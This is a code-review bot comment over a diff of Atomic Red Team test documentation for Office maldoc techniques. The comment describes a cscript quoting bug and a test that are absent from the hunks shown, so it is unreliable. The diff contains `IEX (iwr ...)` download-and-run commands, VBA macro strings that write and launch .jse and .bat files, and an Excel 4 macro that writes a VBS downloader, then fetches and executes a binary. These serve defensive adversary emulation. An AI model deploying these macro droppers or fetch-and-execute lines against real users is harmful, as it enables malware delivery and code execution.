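Review bot: `cscript #{vbscript} > $env:TEMP\T1059.005.out.txt` hands the substituted path to cscript unquoted, so a `vbscript` value containing a space (an atomics folder under `Program Files`, or a profile path with a space) is split into several arguments and the test fails before any output is written; quoting it as `command: 'cscript "#{vbscript}" > $env:TEMP\T1059.005.out.txt'` keeps the rename and makes the executor path-safe. The `Split-Path #{vbscript}` and `Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force` lines in the get-prereq step look exposed to the same splitting, though they predate this commit. The Encoded VBS test entry continues past the end of the hunk.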
@@ -18,6 +18,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #5 - Office launching .bat file from AppData](#atomic-test-5---office-launching-bat-file-from-appdata)
- [Atomic Test #6 - Excel 4 Macro](#atomic-test-6---excel-4-macro)
<br/>
@@ -38,7 +40,6 @@ References:
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:&#92;Users&#92;Public&#92;art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -46,31 +47,31 @@ References:
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
$ms_office_version = #{ms_office_version}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -127,7 +128,6 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word or Excel | String | Word|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -135,30 +135,27 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
$ms_office_version = #{ms_office_version}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -181,7 +178,6 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
|------|-------------|------|---------------|
| jse_path | jse file to execute with wscript | Path | C:&#92;Users&#92;Public&#92;art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)|
#### Attack Commands: Run with `powershell`!
@@ -189,31 +185,27 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
$ms_office_version = #{ms_office_version}
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -233,8 +225,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bat_path | Path to malicious .bat file | String | $env:temp+"&#92;art1204.bat"|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office". Default latest version. | string | ((Get-ChildItem Registry::HKEY_CURRENT_USER&#92;Software&#92;Microsoft&#92;Office -Name | select-string -pattern "^&#92;d+&#92;.&#92;d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
| bat_path | Path to malicious .bat file | String | $("$env:temp&#92;art1204.bat")|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -243,32 +234,135 @@ Microsoft Office creating then launching a .bat script from an AppData directory
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$bat_path = #{bat_path}
$macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
```
#### Cleanup Commands:
```powershell
$ms_office_version = #{ms_office_version}
if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
<br/>
<br/>
## Atomic Test #6 - Excel 4 Macro
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
with Excel matches that of the local system. This username can be found under Files -> Options -> Username
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| download_url | Download URL | String | https://live.sysinternals.com/procexp.exe|
| uname | Username for pathing | String | $env:Username|
#### Attack Commands: Run with `powershell`!
```powershell
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
Remove-Item $fname
Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("#{uname}" -ne "") {
$sheet.Cells.Item(1,1) = "#{uname}"
} else {
$sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlApp
```
#### Cleanup Commands:
```powershell
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Microsoft Excel must be installed
##### Check Prereq Commands:
```powershell
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
```
+1 -1
@@ -165,7 +165,7 @@ atomic_tests:
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
- name: Excel 4 Macro
auto_generated_guid:
auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
description: |
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
+10 -8
@@ -63,7 +63,6 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:&#92;Users&#92;Public&#92;art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER&#92;SOFTWARE&#92;Microsoft&#92;Office" | String | 16.0|
#### Attack Commands: Run with `powershell`!
@@ -72,27 +71,30 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependent registry keys
##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
+2
@@ -625,3 +625,5 @@ f38e9eea-e1d7-4ba6-b716-584791963827
60e860b6-8ae6-49db-ad07-5e73edd88f5d
9215ea92-1ded-41b7-9cd6-79f9a78397aa
9a2915b3-3954-4cce-8c76-00fbf4dbd014
e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
4ea1fc97-8a46-4b4e-ba48-af43d2a98052